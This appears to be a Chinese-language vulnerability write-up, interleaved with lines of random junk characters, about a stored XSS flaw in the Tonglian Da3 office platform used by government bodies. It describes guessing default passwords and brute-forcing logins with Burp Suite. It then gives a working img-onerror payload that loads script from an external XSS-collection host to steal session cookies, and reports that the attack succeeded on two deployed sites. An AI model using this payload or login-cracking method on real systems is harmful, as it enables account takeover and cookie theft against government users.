/ J& ~- q) z, [$ E7 M! _# E# W2 z
) S7 `& P! ^: n) @' q 同联Da3协同办公平台后台通用储存型xss漏洞
2 X' K" I) G+ r$ G [6 t+ h- ?
7 L3 S7 R0 r& ]4 U* P3 p& E. O k R4 j/ R) J% i
平台简介:, x& ?& J' z8 ^5 ~/ g/ B
6 Q# y+ ?7 e, \2 {8 n) ~
! j& ~# _. u5 e O3 Y 7 {2 X L+ G1 g* S' Y$ ?
( U$ R. V: u, @+ P2 Q4 k
# y: n" S e8 i s" a, L, Z, m/ ? 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" X0 T( [$ \% f( u5 j6 ]- a. Z
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 F, u- w( D; D1 m& ]! l+ t, J$ ?
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
8 A% P% A L! y7 d: H5 D9 K% N' }
5 \5 s% E7 h/ o, ^ 4 b/ t6 k9 Q# q5 r9 s( j( ]
- I2 i! c+ @( w% c2 d* T, w5 f9 m
- c+ c9 U9 d$ y5 \ l1 _) O' R' a; p
4 U$ U; k7 T4 n+ j2 k' O1 n 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
8 R1 ~7 \0 [1 `
4 `1 x; G9 e. ^' P' E& Z {! B % A" r+ T1 y0 k+ p: k! \* A
, v1 d8 ?) V: t' M8 C7 y. d F1 r
/ @5 B1 W( y) ?, X4 P
" U! H& v& L! P/ {1 d
http://1.1.1.1:7197/cap-aco/#(案例2-)7 y; @ o. Z: ~
1 k9 t: k6 m1 V" U+ V) X2 P6 j- \
- G8 o! N. o9 M, K2 V
http://www.XXOO.com (案例1-官网网站)
! C* R0 c+ ~: g( @* [9 x4 @3 {: B5 [
! n: T6 O& n5 t4 N, t) @+ l/ O
- R5 A' P: Y1 w7 o/ s. B$ O 漏洞详情:
) i- W6 I/ @5 b
0 w2 _+ x2 ` N9 [+ n
5 U6 p O$ m H, Z 案例一、- J# G5 F7 W0 \& J
' O7 [+ E1 x) A8 E0 \) b
# B- R- ]% A0 i! G. [8 i+ c8 y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
1 ^5 Y* x! o7 Z7 x6 l# r" A: A
9 e( v: N9 _( p; Y* S4 S
1 l* d+ z2 K2 z5 m% p0 y6 l$ i. z 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
0 o. B+ G0 b- T. z8 _4 l8 h$ _
7 {7 b( {* z/ X- q$ @ * f3 K) O5 [5 Y+ U* C' o3 j9 o
1 t) z8 A s6 A8 v$ g+ W9 V/ V9 D, [1 F
) Z J; C6 m% d/ v5 T/ n
$ k4 u7 l5 X; i3 Q& f$ }0 ?5 Q
. s1 d+ v8 d) K$ n* k
# a$ }; w2 O$ \
, B2 v$ y G! l& S0 [/ `6 B status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
" J+ X3 l' @- _5 o2 z
8 O6 E3 @# R) m! h M! f # p0 }/ p3 ~! L7 X6 k* _; Z+ e7 l: j
. I$ w# @. E# U# b
8 R0 [4 e: N- N. r+ m
2 S8 ]( z1 Y" J- M; i2 |6 B0 C
; n3 V9 f3 N) y" H( @
( e% @: U/ T) x: W 0 w: x* X3 T' @
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 + [7 _8 B8 x) \$ g( J4 \) X
& u( R' L2 T' v, _/ d; q
( M' ^& D j( L, M M! n0 Z9 i9 a9 m$ d
g+ b6 ]2 Q! z, W$ w% ^4 O
9 `* c3 a. V" k: g
0 ?; l! O1 A; o. m <img src=x
( D4 ]& [. z* j8 A5 u6 E: ?, }6 u1 Eonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
: P i$ w7 Z9 B) I' ?6 p" H" R
0 t& g; Z, k, I/ p% J" z% G( R+ {2 y 7 `" P9 c2 d) X$ E' \ q( M
! A: u: l* w; j+ {
+ J; E7 Z3 c: ]+ G0 F% |$ y; m( p
. ?7 X/ @+ {+ V/ [) C9 Y* J
然后发送,接收cookie如图:
, V+ z9 _% c7 g* V; r7 m
* c: D- s3 Z ~/ m& V
1 e S1 M7 R+ C * B5 E. j3 C; t, ^& G+ m1 G V( y$ y
5 J+ r% s* d, W% X 8 W0 V" O7 m0 D- Z- k
' [4 J9 V, R% R0 {" K7 J- W
, ^8 B0 s3 p I& y
, Y2 r. [0 D7 |8 y0 i+ B8 r3 D " k0 p: T2 R' s6 u2 F
7 @% R% x5 U' {+ r
" O! b6 h; w& f8 N1 t/ W & `6 P3 A: x0 H1 j4 K* Q
0 I! P. o% I$ N1 X0 t$ \ 1 L, s8 E0 Z& D6 s9 C. D9 h# P0 U& `
4 G7 }4 J& Z- t5 I1 c
( l+ d; Y% ]- b( P( g ) C3 M/ E. d( m0 S$ a; L2 q, i
% n7 o# H; N. m; W! s8 ?
, u8 L9 }! t9 \- Q
~: ~+ P7 Q4 t; G) g
$ i* [9 e8 W$ Z. \. x: I' |* ?
Z6 ]7 O% O9 o1 N& s* l ; {" R. _; i: v L4 ?
案例2、 ! s% X% w; k/ }* I2 }2 p6 C
# x5 r/ k3 P, q' J
7 L% G1 t% y. Q' l- A 前面步骤都一样,下面看效果图: 7 v8 S. V8 n8 \0 k; G
, E3 ^8 G5 z. l6 G! P
: X( b+ [5 e' G0 N
* L9 \" _! @6 F C* V9 y7 y# r7 t
9 Q5 k) Q' X" V! x, Z! l
0 o) l2 }( s3 e" C% T5 F
1 [! b/ k; J. h- f8 {- ]! N# s
2 M9 g% L# u9 a; P. B. ^
0 i: `6 K' g. d# ^
$ ^; O3 x3 e. N/ m
1 k( w: m/ p; f- d+ o% F* o M9 \6 j
3 `3 m: t* @+ U) \, [* Y* Y
* j! J/ a9 Y$ \, ]; m" f% j
. n9 B, j) z4 b* n
; M* K% N& Y+ B# d H; [
. e$ Q. P" t! m" S
2 \/ T1 U/ A; u0 C5 t4 j5 l9 z $ {) ~& {+ U, y- D3 B
0 r g/ W! i- K& H9 i7 A9 Z% `4 \
( W+ d' h: a; M% H" h& { j3 ^ : a' `6 n! B$ z; k0 p+ u! f
( }# U j" ^4 b2 N# Q* A& y. t
: p& i- z5 E4 r. ~- J: U
5 {) P$ P" `; p0 O4 |! Z* C5 G8 g
# w+ L3 V9 [! e4 u' }* a1 ]
0 Y) K% x3 n% {9 g2 M " b5 b+ Z/ b1 A2 O3 D7 k1 n Y, ~/ A
n+ _/ E- e4 C* w
5 o2 i& ]1 J1 j